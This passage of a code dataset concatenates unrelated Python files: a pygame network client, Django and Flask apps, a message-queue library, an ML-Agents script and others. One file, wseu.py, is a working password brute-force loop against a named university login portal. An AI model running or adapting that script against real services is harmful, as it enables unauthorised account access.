send_net_message(client_socket, server_addr, message):\n\tshould_send = random.randint(1, 100)\n\tif should_send > 10:\n\t\tclient_socket.sendto(message.encode('utf-8'), server_addr)\n\n\ndef get_net_message(client_socket):\n\ttry:\n\t\tmessage, address = client_socket.recvfrom(1024)\n\texcept:\n\t\treturn None, None\n\n\treturn message, address\n\n\ndef process_net_message(client_socket, message, address):\n\tmessage = msgpack.loads(message, raw=False)\n\tif '' in message:\n\t\treturn None, None\n\telif ''.format(name))\n\ti = 0\n\twhile i < 1000:\n\t\tmessage, address = get_net_message(client_socket)\n\t\tif message is not None:\n\t\t\t_id = process_net_message(client_socket, message, address)\n\t\t\tbreak\n\t\ti += 1\n\telse:\n\t\tgame_running = False\n\t\tplayer_list = None\n\t\tprint(\"Failed to Join.\")\n\n\tprint('ID: {}'.format(_id))\n\n\tgame_state_dict = {}\n\tplayer_list = 
[]\n\tprevious_keys_pressed = pygame.key.get_pressed()\n\n\talive_timer = 0\n\n\tstart = time.time()\n\twhile game_running:\n\t\tcurrent = time.time()\n\t\tdt = current - start\n\t\tstart = current\n\n\t\talive_timer += dt\n\t\tif alive_timer >= 0.5:\n\t\t\talive_timer = 0\n\t\t\tsend_net_message(client_socket, server_address, '')\n\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tgame_running = False\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_ESCAPE:\n\t\t\t\t\tgame_running = False\n\t\t\t\telse:\n\t\t\t\t\tsend_net_message(client_socket, server_address, ''.format(str(event.key)))\n\t\t\tif event.type == pygame.KEYUP:\n\t\t\t\tsend_net_message(client_socket, server_address, ''.format(str(event.key)))\n\n\t\twhile True:\n\t\t\tmessage, address = get_net_message(client_socket)\n\t\t\tif message is None:\n\t\t\t\tbreak\n\t\t\tgame_state_dict, player_list = process_net_message(client_socket, message, address)\n\t\t\tif game_state_dict is None and player_list is None:\n\t\t\t\tgame_running = False\n\n\t\tserver_keys_pressed = []\n\t\tif game_state_dict is not None:\n\t\t\tif int(_id) in game_state_dict['keys_down']:\n\t\t\t\tserver_keys_pressed = game_state_dict['keys_down'][int(_id)]\n\n\t\t#print(server_keys_pressed)\n\n\t\t# keys_pressed = pygame.key.get_pressed()\n\t\t# for i in range(0, len(keys_pressed)):\n\t\t# \tif keys_pressed[i] and not previous_keys_pressed[i] and i not in server_keys_pressed:\n\t\t# \t\tsend_net_message(client_socket, server_address, ''.format(str(i)))\n\t\t# \tif not keys_pressed[i] and previous_keys_pressed[i] and i not in server_keys_pressed:\n\t\t# \t\tsend_net_message(client_socket, server_address, ''.format(str(i)))\n\t\t# previous_keys_pressed = keys_pressed\n\n\t\tpygame.draw.rect(surface, (0, 0, 0), (0, 0, WIDTH, HEIGHT), 0)\n\n\t\tif player_list:\n\t\t\tfor player in player_list:\n\t\t\t\tplayer.render(surface)\n\n\t\tpygame.display.update()\n\n\tif player_list:\n\t\tsend_net_message(client_socket, server_address, '')\n\tpygame.display.quit()\n","sub_path":"gameclient.py","file_name":"gameclient.py","file_ext":"py","file_size_in_byte":4827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"451646090","text":"import requests\nimport json\nimport base64\nimport time\nreq = requests.Session()\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'}\nprint(\"Starting brute force......\")\nfor line in open('D:\\\\seu.txt'):\n line = line.strip('\\n')\n codestr = base64.b64encode(line.encode('UTF-8'))\n code = codestr.decode()\n #print(code)\n data = {\n 'enablemacauth':\t'0',\n 'password':\tcode,\n 'username':\t'seu'\n }\n signin = req.post('https://w.seu.edu.cn/index.php/index/login', data = data, headers = headers)\n tjson = json.loads(signin.text)\n #print(tjson[\"info\"])\n #t = base64.b64decode(line)\n #print(t)\n # \"认证成功\" is the server's \"authentication succeeded\" response value\n if tjson[\"info\"] == \"认证成功\":\n print(\"Authentication succeeded: \" + line)\n break\n\n\n","sub_path":"wseu.py","file_name":"wseu.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"233417937","text":"from django.core.management.base import BaseCommand\nfrom personnel.models import Personnel, PersonnelPermission\n\nmanager_permissions = [\n 'create_revenue',\n 'create_gameremit',\n 'create_debt', 'create_expenditure',\n 'create_month_check', 'start_monthly_check',\n 
'create_viewcenterremit', 'create_division', 'create_team',\n]\n\nclass Command(BaseCommand):\n help = 'Grant common manager permissions'\n\n def add_arguments(self, parser):\n parser.add_argument('-email', type=str)\n\n def handle(self, *args, **options):\n self.stdout.write(self.style.SUCCESS('Update manager permissions'))\n email = options['email']\n\n person = Personnel.objects.get(user__email=email)\n\n # first strip user of all permissions\n for each in PersonnelPermission.objects.all():\n each.personnel.remove(person)\n self.stdout.write(self.style.SUCCESS('Finished removing all permissions.'))\n\n # # assign manager permissions\n for each in manager_permissions:\n permission = PersonnelPermission.objects.get(code_name=each)\n permission.personnel.add(person)\n self.stdout.write(self.style.SUCCESS(f'{person} successfully granted {permission}'))\n self.stdout.write(self.style.SUCCESS('Done'))\n","sub_path":"personnel/management/commands/make_manager.py","file_name":"make_manager.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"633070786","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import division, unicode_literals\n\nimport logging\nimport os\nimport subprocess\n\nfrom spreads.plugin import HookPlugin, OutputHookMixin\nfrom spreads.util import MissingDependencyException, find_in_path\n\nif not find_in_path('pdfbeads'):\n raise MissingDependencyException(\"Could not find executable `pdfbeads` in\"\n \" $PATH. Please install the appropriate\"\n \" package(s)!\")\n\nlogger = logging.getLogger('spreadsplug.pdfbeads')\n\n\nclass PDFBeadsPlugin(HookPlugin, OutputHookMixin):\n __name__ = 'pdfbeads'\n\n def output(self, path):\n logger.info(\"Assembling PDF.\")\n img_dir = path / 'done'\n pdf_file = path / 'out' / \"{0}.pdf\".format(path.name)\n img_files = [unicode(x.name) for x in sorted(img_dir.glob('*.tif'))]\n cmd = [\"pdfbeads\", \"-d\"] + img_files + [\"-o\", unicode(pdf_file)]\n logger.debug(\"Running \" + \" \".join(cmd))\n # NOTE: pdfbeads only finds *html files for the text layer in the\n # working directory...\n os.chdir(unicode(img_dir))\n output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)\n logger.debug(\"Output:\\n{0}\".format(output))\n","sub_path":"spreadsplug/pdfbeads.py","file_name":"pdfbeads.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"252809079","text":"import subprocess\n\nfrom gitviewfs_objects import BlobFile\nfrom tests.structs.default import paths\nfrom tests.structs.default.utils import BaseDefaultDirStructTest,\\\n\tBaseDefaultDirStructIntegrationTest\n\n\nclass BlobFileTest(BaseDefaultDirStructTest):\n\t\n\tdef test_path(self):\n\t\tself.assertPathIs(paths.BLOB_FILE, BlobFile)\n\n\nclass BlobFileIntegrationTest(BaseDefaultDirStructIntegrationTest):\n\t\n\tdef test_blob_content(self):\n\t\tfilename, content = self.create_and_commit_file()\n\t\tblob_sha1 = subprocess.check_output(['git', 'hash-object', filename]).strip()\n\t\t\n\t\tblob_path = self.make_blob_file_path(blob_sha1)\n\t\twith open(blob_path) as f:\n\t\t\tread_content = f.read()\n\t\t\n\t\tself.assertEqual(read_content, content)\n","sub_path":"tests/structs/default/test_blob_file.py","file_name":"test_blob_file.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"28164359","text":"# 
Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def longestUnivaluePath(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n if root is None:\n return 0\n self.L = []\n self.checkPath(root)\n # self.L holds path lengths counted in nodes; subtract 1 for edges\n return max(self.L) - 1\n\n\n def checkPath(self, node):\n if node is None:\n return 0\n left = self.checkPath(node.left)\n right = self.checkPath(node.right)\n l = r = 0\n if node.left and node.left.val == node.val:\n l = left + 1\n if node.right and node.right.val == node.val:\n r = right + 1\n self.L.append(l + r + 1)\n return max(l, r)","sub_path":"longestUnivaluePath.py","file_name":"longestUnivaluePath.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"412043884","text":"# @copyright@\n# Copyright (c) 2006 - 2018 Teradata\n# All rights reserved. Stacki(r) v5.x stacki.com\n# https://github.com/Teradata/stacki/blob/master/LICENSE.txt\n# @copyright@\n\nimport time\nimport threading\nimport zmq\nimport json\nimport socket\nimport sys\nimport os\n\n\nclass ports:\n\t\"\"\"\n\tSocket port numbers used by the Stack Message Queue daemons.\n\n\t:var publish: UDP socket service for publishing a message\n\t:var subscribe: zmq.SUB socket for subscribing to a channel\n\t:var control: TCP socket service for enabling/disabling channel propagation\n\t\"\"\"\n\tpublish\t\t= 5000\n\tsubscribe\t= 5001\n\tcontrol\t\t= 5002\n\n\nclass Message():\n\t\"\"\"\n\tStack Message Queue Message\n\n\tA Message is composed of header fields and the *message* text body. For many\n\tapplications only body is manipulated and other fields are controlled by\n\tlower software levels. \n\n\tFor simple Messages the *message* body can be a string. 
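For example, a minimal\n\tround trip might look like this sketch (the channel name 'health' is\n\tillustrative)::\n\n\t\t>>> msg = Message(channel='health', message='hello')\n\t\t>>> pkt = msg.dumps()\n\t\t>>> copy = Message()\n\t\t>>> copy.loads(pkt.encode())\n\t\t>>> copy.getMessage()\n\t\t'hello'\n\n\t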
For more complex Messages\n\tthe body should be a json encoded python dictionary.\n\t\"\"\"\n\n\tdef __init__(self, channel=None, message=None, hops=0, source=None, time=None, id=None):\n\t\t\"\"\"\n\t\tConstructor will create a new empty :class:`Message` and set any of the fields\n\t\tprovided in the parameter list.\n\n\t\t:param channel: channel source or destination\n\t\t:type channel: string\n\n\t\t:param message: body of message\n\t\t:type message: string\n\n\t\t:param hops: number of software hops traversed\n\t\t:type hops: int\n\n\t\t:param source: source host (usually an IP address)\n\t\t:type source: string\n\n\t\t:param time: text timestamp\n\t\t:type time: string\n\n\t\t:param id: unique message identifier\n\t\t:type id: int\n\n\t\t:returns: a new :class:`Message`\n\t\t\"\"\"\n\t\tself.channel = channel\n\t\tself.message = message\n\t\tself.hops = hops\n\t\tself.source = source\n\t\tself.time = time\n\t\tself.id\t = id\n\n\tdef getChannel(self):\n\t\t\"\"\"\n\t\t:returns: channel name\n\t\t\"\"\"\n\t\treturn str(self.channel)\n\n\tdef setChannel(self, channel):\n\t\t\"\"\"\n\t\tSet the channel name\n\n\t\t:param channel: channel name\n\t\t:type channel: string\n\t\t\"\"\"\n\t\tself.channel = channel\n\n\tdef getMessage(self):\n\t\t\"\"\"\n\t\t:returns: message text\n\t\t\"\"\"\n\t\treturn self.message\n\n\tdef setMessage(self, message):\n\t\t\"\"\"\n\t\tSets the message text\n\t\t\n\t\t:param message: text\n\t\t:type message: string\n\t\t\"\"\"\n\t\tself.message = message\n\n\tdef getHops(self):\n\t\t\"\"\"\n\t\t:returns: number of software hops \n\t\t\"\"\"\n\t\treturn self.hops\n\n\tdef getSource(self):\n\t\t\"\"\"\n\t\t:returns: source address\n\t\t\"\"\"\n\t\treturn self.source\n\n\tdef setSource(self, addr):\n\t\t\"\"\"\n\t\tSet the source host address. This address can be a hostname\n\t\tor an IP Address.\n\t\t\n\t\t:param addr: source address\n\t\t:type addr: string\n\t\t\"\"\"\n\t\tself.source = addr\n\n\tdef getTime(self):\n\t\t\"\"\"\n\t\t:returns: timestamp\n\t\t\"\"\"\n\t\treturn self.time\n\n\tdef setTime(self, t):\n\t\t\"\"\"\n\t\tSets the timestamp. Timestamps should be human readable\n\t\tand reflect the time the message was first inserted into\n\t\tthe message queue.\n\n\t\t:param t: timestamp\n\t\t:type t: string\n\t\t\"\"\"\n\t\tself.time = t\n\n\tdef getID(self):\n\t\t\"\"\"\n\t\t:returns: :class:`Message` ID\n\t\t\"\"\"\n\t\treturn self.id\n\n\tdef setID(self, id):\n\t\t\"\"\"\n\t\tSets the numeric identifier.\n\t\tIdentifiers must be unique for a given channel and host.\n\n\t\t:param id: numeric identifier\n\t\t:type id: int\n\t\t\"\"\"\n\t\tself.id = id\n\n\tdef addHop(self):\n\t\t\"\"\"\n\t\tIncrements the hop count for the :class:`Message`. A hop is\n\t\tdefined as a software hop not a physical network hop. \n\t\tEvery time an application receives and retransmits a message the\n\t\thop should be incremented. 
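For example, a relaying\n\t\tdaemon might do something like this sketch (the ``pub`` publisher\n\t\tsocket is hypothetical)::\n\n\t\t\tmsg.addHop()\n\t\t\tpub.send_multipart([msg.getChannel().encode(),\n\t\t\t\tmsg.dumps(channel=False).encode()])\n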
\n\t\tThis value is used for debugging.\n\t\t\"\"\"\n\t\tself.hops += 1\n\n\tdef getDict(self, channel=True):\n\t\t\"\"\"\n\t\tReturns a dictionary of all the :class:`Message` fields.\n\t\tBy default this will include the name of the message\n\t\tchannel which is correct for most uses.\n\t\tHowever, when the message is going to be published on a\n\t\tzeromq pub/sub socket the channel name is already prepended to\n\t\tthe string containing the message.\n\t\tFor this case set the *channel* parameter to False.\n\n\t\t:param channel: include channel field\n\t\t:type channel: bool\n\t\t:returns: python dictionary\n\t\t\"\"\"\n\t\td = {}\n\t\tif channel:\n\t\t\tif self.channel:\n\t\t\t\td['channel'] = self.channel\n\t\tif self.id is not None:\n\t\t\td['id'] = self.id\n\t\tif self.message:\n\t\t\td['message'] = self.message\n\t\tif self.hops:\n\t\t\td['hops'] = self.hops\n\t\tif self.source:\n\t\t\td['source'] = self.source\n\t\tif self.time:\n\t\t\td['time'] = self.time\n\t\treturn d\n\n\tdef dumps(self, channel=True):\n\t\t\"\"\"\n\t\tCreates a dictionary of all the :class:`Message` fields and returns\n\t\tit as a json string. \n\t\tJust as with :func:`getDict` the name of the message channel\n\t\tcan be excluded from the resulting dictionary.\n\n\t\t:param channel: include channel field\n\t\t:type channel: bool\n\t\t:returns: json representation of the message\n\t\t\"\"\"\n\t\td = self.getDict(channel)\n\t\treturn json.dumps(d)\n\n\tdef loads(self, packet):\n\t\t\"\"\"\n\t\tParses the *packet* and updates all the included\n\t\tmessage fields for this :class:`Message`.\n\n\t\t:param packet: json representation of a message\n\t\t:type packet: string\n\t\t\"\"\"\n\t\td = json.loads(packet.decode())\n\t\tif 'channel' in d:\n\t\t\tself.channel = d['channel']\n\t\tif 'id' in d:\n\t\t\tself.id = d['id']\n\t\tif 'message' in d:\n\t\t\tself.message = d['message']\n\t\tif 'hops' in d:\n\t\t\tself.hops = d['hops']\n\t\tif 'source' in d:\n\t\t\tself.source = d['source']\n\t\tif 'time' in d:\n\t\t\tself.time = d['time']\n\n\nclass Subscriber(threading.Thread):\n\t\"\"\"\n\tA Subscriber thread is used by applications to subscribe and unsubscribe\n\tto channels on a message queue on exactly one host.\n\tFor every :class:`Message` received a :func:`callback` is invoked and the\n\tmessage is handled according to the derived class implementation.\n\tOnce the subscriber thread is started it will not exit.\n\t\"\"\"\n\n\tdef __init__(self, context, host='localhost'):\n\t\t\"\"\"\n\t\tConstructor creates a new :class:`Subscriber` and connects to the\n\t\tzeromq subscribe socket on the remote *host*.\n\n\t\t:param context: zeromq context\n\t\t:param host: name of publishing host\n\t\t:type host: string\n\n\t\t:returns: a new :class:`Subscriber`\n\t\t\"\"\"\n\t\tthreading.Thread.__init__(self)\n\n\t\tself.sub = context.socket(zmq.SUB)\n\t\tself.sub.connect('tcp://%s:%d' % (host, ports.subscribe))\n\n\tdef subscribe(self, channel):\n\t\t\"\"\"\n\t\tSubscribes to all channels that start with the\n\t\tsub-string *channel*.\n\n\t\t:param channel: pattern of channels to subscribe\n\t\t:type channel: string\n\t\t\"\"\"\n\t\tself.sub.setsockopt_string(zmq.SUBSCRIBE, channel)\n\n\tdef unsubscribe(self, channel):\n\t\t\"\"\"\n\t\tUnsubscribe from the given *channel*. 
Subscriptions are\n\t\treference counted so you must unsubscribe once for every\n\t\ttime you :func:`subscribe`.\n\n\t\t:param channel: channel name\n\t\t:type channel: string\n\t\t\"\"\"\n\t\tself.sub.setsockopt_string(zmq.UNSUBSCRIBE, channel)\n\t\t\n\tdef run(self):\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tchannel, pkt = self.sub.recv_multipart()\n\t\t\t\tmsg = Message(channel.decode())\n\t\t\t\tmsg.loads(pkt)\n\t\t\texcept:\n\t\t\t\tcontinue\n\t\t\tif 'STACKDEBUG' in os.environ:\n\t\t\t\tprint (msg.getDict())\n\t\t\tself.callback(msg)\n\n\n\tdef callback(self, message):\n\t\t\"\"\"\n\t\tCalled for every received message. All derived classes must\n\t\timplement this method. The default behavior does nothing.\n\n\t\t:param message: received message\n\t\t:type message: stack.mq.Message\n\t\t\"\"\"\n\t\tpass\n\n\nclass Receiver(threading.Thread):\n\t\"\"\"\n\tA Receiver thread listens on a UDP socket and receives both\n\ttext messages and :class:`Message` objects.\n\tFor every message received a :func:`callback` is invoked and the\n\tmessage is handled according to the derived class implementation.\n\tOnce the Receiver thread is started it will not exit.\n\t\"\"\"\n\n\tdef __init__(self):\n\t\tthreading.Thread.__init__(self)\n\n\t\tself.rx = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\tself.rx.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\t\tself.rx.bind(('', ports.publish))\n\n\tdef run(self):\n\t\twhile True:\n\t\t\tpkt, addr = self.rx.recvfrom(65565)\n\n\t\t\t# All clients send text ( )\n\t\t\t# But, internally all messages are json. To allow\n\t\t\t# arbitrary wiring of daemons we need to accept\n\t\t\t# json as input also.\n\t\t\t#\n\t\t\t# Note the callback() always pushes data as\n\t\t\t# stack.mq.Message objects. This is the only\n\t\t\t# part of the code where we handle receiving \n\t\t\t# unstructured data.\n\t\t\t#\n\t\t\t# Design point here was to keep the clients \n\t\t\t# simple so we don't need an API to write to\n\t\t\t# the message queue.\n\n\t\t\tmsg = None\n\t\t\ttm = time.asctime()\n\t\t\ttry:\n\t\t\t\tmsg = Message(time=tm)\n\t\t\t\tmsg.loads(pkt)\n\t\t\texcept:\n\t\t\t\ttry:\n\t\t\t\t\t(c, m) = pkt.split(' ', 1)\n\t\t\t\t\tmsg = Message(c, m, time=tm)\n\t\t\t\texcept:\n\t\t\t\t\tpass # drop bad message\n\t\t\tif msg:\n\t\t\t\tif not msg.getSource() and addr[0] != '127.0.0.1':\n\t\t\t\t\tmsg.setSource(addr[0])\n\t\t\t\tself.callback(msg)\n\n\tdef callback(self, message):\n\t\t\"\"\"\n\t\tCalled for every received message. All derived classes must\n\t\timplement this method. 
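A typical subclass is only a\n\t\tfew lines; this sketch prints every message on channels that start\n\t\twith 'health' (the channel prefix is illustrative)::\n\n\t\t\tclass HealthLogger(Subscriber):\n\t\t\t\tdef callback(self, message):\n\t\t\t\t\tprint(message.getTime(), message.getMessage())\n\n\t\t\tsub = HealthLogger(zmq.Context())\n\t\t\tsub.subscribe('health')\n\t\t\tsub.start()\n\n\t\t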
The default behavior does nothing.\n\n\t\t:param message: received message\n\t\t:type message: stack.mq.Message\n\t\t\"\"\"\n\t\tpass\n\n\n\n\n\n\n","sub_path":"common/src/stack/mq/pylib/mq/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"121720340","text":"from mlagents_envs.environment import UnityEnvironment\r\nfrom mlagents_envs.base_env import ActionTuple\r\nfrom mlagents_envs.side_channel.engine_configuration_channel import EngineConfigurationChannel\r\nfrom mlagents_envs.registry import default_registry\r\n\r\nimport random\r\nimport numpy as np\r\nimport sys\r\nfrom evolution import params_reshape, build_net, evaluate_population\r\n\r\nl1_size = 16 # number of neurons in 1st layer\r\nl2_size = 32 # number of neurons in 2nd layer\r\nPOP_SIZE = 12 # population size\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n # This is a non-blocking call that only loads the environment.\r\n print (\"Script started. Please start Unity environment to start training proccess.\")\r\n engine_channel = EngineConfigurationChannel()\r\n # env = UnityEnvironment( side_channels=[engine_channel])\r\n env = default_registry[\"3DBall\"].make(side_channels = [engine_channel])\r\n engine_channel.set_configuration_parameters(time_scale = 1, width=1920, height=1080) # control time scale 0.5 - half speed, 10. - 10x time\r\n # Start interacting with the environment.\r\n env.reset()\r\n # Info about our environment ---------------------\r\n print (f\"number of behaviours: {len(list(env.behavior_specs) )}\")\r\n behavior_name = list(env.behavior_specs)[0]\r\n spec = env.behavior_specs[behavior_name]\r\n action_spec = spec.action_spec\r\n decision_steps, terminal_steps = env.get_steps(behavior_name)\r\n # Examine the number of observations per Agent\r\n print(\"Number of observations : \", len(spec.observation_specs))\r\n print(\" observations : \", spec.observation_specs)\r\n # Is the Action continuous or multi-discrete ?\r\n if action_spec.is_continuous():\r\n print(\"The action is continuous\")\r\n print(f\"There are {action_spec.continuous_size} action(s)\")\r\n # Create neural network structure and get its shape and flat params (weights, biases) for continues actions (-1;1)\r\n net_shapes, net_params = build_net(decision_steps.obs[0].shape[1],\r\n action_spec.continuous_size, l1_size, l2_size)\r\n\r\n # print (spec.action_spec.random_action() )\r\n if action_spec.is_discrete():\r\n print(\"The action is discrete\")\r\n # How many actions are possible ?\r\n print(f\"There are {action_spec.discrete_size} action(s)\")\r\n for action, branch_size in enumerate(action_spec.discrete_branches):\r\n print(f\"Action number {action} has {branch_size} different options\")\r\n # Create neural network structure and get its shape and flat params (weights, biases) for continues actions (-1;1)\r\n net_shapes, net_params = build_net(decision_steps.obs[0].shape[1],\r\n action_spec.discrete_branches[0], l1_size, l2_size)\r\n \r\n for index, shape in enumerate(decision_steps.obs):\r\n # if len(shape) == 1:\r\n print(f\"obs shape: {decision_steps.obs[index].shape}\")\r\n print(f\"First vector observations : {decision_steps.obs[index][0,:]} \\n shape: {decision_steps.obs[index][0].shape}\", )\r\n for index, shape in enumerate(terminal_steps.obs):\r\n # if len(shape) == 1:\r\n print(f\"terminal obs shape: {terminal_steps.obs[index].shape}\")\r\n print(f\"First vector observations terminal : 
{terminal_steps.obs[index]}\\\r\n \\n shape: {terminal_steps.obs[index].shape}\", )\r\n # Info about our environment ---------------------\r\n param = np.loadtxt(sys.argv[1])\r\n # p = params_reshape(net_shapes, param)\r\n while True:\r\n ep_reward = 0\r\n pop = [param] * POP_SIZE\r\n episode_rewards = evaluate_population(pop, env, net_shapes, inference=True)\r\n print (f\"average reward: {sum(episode_rewards)/len(episode_rewards)}\")\r\n finally:\r\n env.close()","sub_path":"evo_inference.py","file_name":"evo_inference.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"356221206","text":"#!/usr/bin/python3\n\"\"\"\n-*- Coding UTF-8 -*-\n\"\"\"\n\nfrom flask import jsonify, abort, request, make_response\nfrom api.v1.views import app_views\nfrom models import storage\nfrom models.place import Place\nfrom models.amenity import Amenity\n\nopt_route = {'strict_slashes': False}\n\n\n@app_views.route('/places/<place_id>/amenities', methods=['GET'], **opt_route)\ndef get_amenities_by_place(place_id):\n \"\"\" Retrieves the list of all Amenities objects of a place \"\"\"\n place = storage.get(Place, place_id)\n\n if not place:\n abort(404)\n\n amenities = [amenity.to_dict() for amenity in place.amenities]\n\n return jsonify(amenities), 200\n\n\n@app_views.route(\n '/places/<place_id>/amenities/<amenity_id>',\n methods=['DELETE'], **opt_route)\ndef delete_amenity_to_place(place_id, amenity_id):\n \"\"\" Deletes an Amenity object from a Place. \"\"\"\n place = storage.get(Place, place_id)\n amenity = storage.get(Amenity, amenity_id)\n\n if not place or not amenity:\n abort(404)\n\n for amenity in place.amenities:\n amenity_ = amenity.to_dict()\n if amenity_.get('id') == amenity_id:\n storage.delete(amenity)\n\n storage.save()\n\n return make_response(jsonify({}), 200)\n","sub_path":"api/v1/views/places_amenities.py","file_name":"places_amenities.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"59802873","text":"# Ask the user for two lowercase words (w1, w2) as input. Create a function called create_anagram(w1, w2).\n# The only allowed operation is to remove a character from any string. 
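(For example, deleting 's' from 'sea' and 't' from 'eat'\n# leaves 'ea' and 'ea', which are anagrams: 2 deletions in total.)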
\n# Find minimum number of characters to be deleted to make both the strings anagram?\n\n# Input:\n# Output:\nfrom collections import Counter\n\n# function to count the minimum number of deletions that\n# make the two strings anagrams of each other\ndef check(s1, s2):\n # characters present in one string but missing from the other must go\n extra = (Counter(s1) - Counter(s2)) + (Counter(s2) - Counter(s1))\n deletions = sum(extra.values())\n if deletions == 0:\n print(\"The strings are anagrams.\")\n else:\n print(f\"The strings aren't anagrams: {deletions} deletion(s) needed.\")\n return deletions\n\n# driver code \nword1 =\"good\"\nword2 =\"doing\"\ncheck(word1, word2)\n","sub_path":"Class_Assignment/CA09/q7.py","file_name":"q7.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"426309751","text":"from typing import List\n\n\nclass Solution:\n def sumEvenAfterQueries(self, A: List[int], queries: List[List[int]]) -> List[int]:\n res = []\n for i in queries:\n val = i[0]\n index = i[1]\n A[index] += val\n even_nums = []\n for num in A:\n if num % 2 == 0:\n even_nums.append(num)\n res.append(sum(even_nums))\n return res\n","sub_path":"985-sum-of-even-nums-after-queries/sum-of-even-numbers-after-queries.py","file_name":"sum-of-even-numbers-after-queries.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"204154990","text":"import os\n\nimport pandas as pd\nimport numpy as np\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine\n\nfrom flask import Flask, jsonify, render_template\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\n#################################################\n# Database Setup\n#################################################\n\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///project.sqlite\"\ndb = SQLAlchemy(app)\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(db.engine, reflect=True)\n# Save references to each table\n#Forecast = Base.classes.forecast\nDataSet = Base.classes.dataset\n\n#Create a session\nsession=Session(db.engine)\n\n@app.route(\"/\")\ndef index():\n \"\"\"Return the homepage.\"\"\"\n return render_template(\"index.html\")\n\n\n@app.route(\"/dashboard\")\ndef comparison():\n \"\"\"Return dashboard.html.\"\"\"\n return render_template(\"dashboard.html\")\n\n@app.route(\"/map\")\ndef map():\n \"\"\"Return map.html.\"\"\"\n return render_template(\"map.html\")\n\n\n@app.route(\"/names\")\ndef names():\n \"\"\"Return a list of city names.\"\"\"\n\n # Return a list of the unique city names\n results=(session.query(DataSet.city).distinct()) \n return jsonify(list(results))\n\n@app.route(\"/cities/<city>\")\ndef cities(city):\n \n results=(session.query(DataSet.city,DataSet.year,DataSet.price_per_sqft,DataSet.forecast_YoY_pct_change, DataSet.total_homes, DataSet.unoccupied_homes, DataSet.monthly_rental_price, DataSet.housing_increase_units)\n .filter(DataSet.city==city)\n .all())\n city_list=[]\n \n for r in results:\n #city_metadata = {}\n #city_metadata[\"city\"]=result[0]\n #city_metadata[\"date\"]=result[1]\n #city_metadata[\"price\"]=result[2]\n #city_list.append(city_metadata)\n city_list.append({\"city\": r[0], \"date\": r[1], \"price\": r[2], \"forecast\": r[3], \"totalhomes\": r[4], \"unoccupied\": r[5], \"rental\": r[6], \"units\": r[7]})\n print(city_list)\n return 
jsonify(city_list)\n\n\n\n@app.route(\"/mapdata\")\ndef map_data():\n \n map_data = (session.query(DataSet.city, DataSet.latitude, DataSet.longitude, DataSet.price_per_sqft, \n DataSet.monthly_rental_price,\n DataSet.population, DataSet.population_density, \n DataSet.population_increase_pct, DataSet.violent_crime_rate, \n DataSet.property_crime_rate, DataSet.total_homes, DataSet.occupied_homes, \n DataSet.unoccupied_homes, DataSet.housing_increase_pct, DataSet.vacancy_rate_pct, \n DataSet.persons_per_household).filter(DataSet.year == 2018).all())\n\n\n house_data = []\n\n for row in map_data:\n info_dict = {}\n info_dict[\"city\"] = row.city\n info_dict[\"latitude\"] = row.latitude\n info_dict[\"longitude\"] = row.longitude\n info_dict[\"price_per_sqft\"] = row.price_per_sqft\n info_dict[\"monthly_rental_price\"] = row.monthly_rental_price\n info_dict[\"population\"] = row.population\n info_dict[\"population_density\"] = row.population_density\n info_dict[\"population_increase_pct\"] = row.population_increase_pct\n info_dict[\"violent_crime_rate\"] = row.violent_crime_rate\n info_dict[\"property_crime_rate\"] = row.property_crime_rate\n info_dict[\"total_homes\"] = row.total_homes\n info_dict[\"occupied_homes\"] = row.occupied_homes\n info_dict[\"unoccupied_homes\"] = row.unoccupied_homes\n info_dict[\"housing_increase_pct\"] = row.housing_increase_pct\n info_dict[\"vacancy_rate_pct\"] = row.vacancy_rate_pct\n info_dict[\"persons_per_household\"] = row.persons_per_household\n house_data.append(info_dict)\n\n\n return jsonify(house_data)\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, 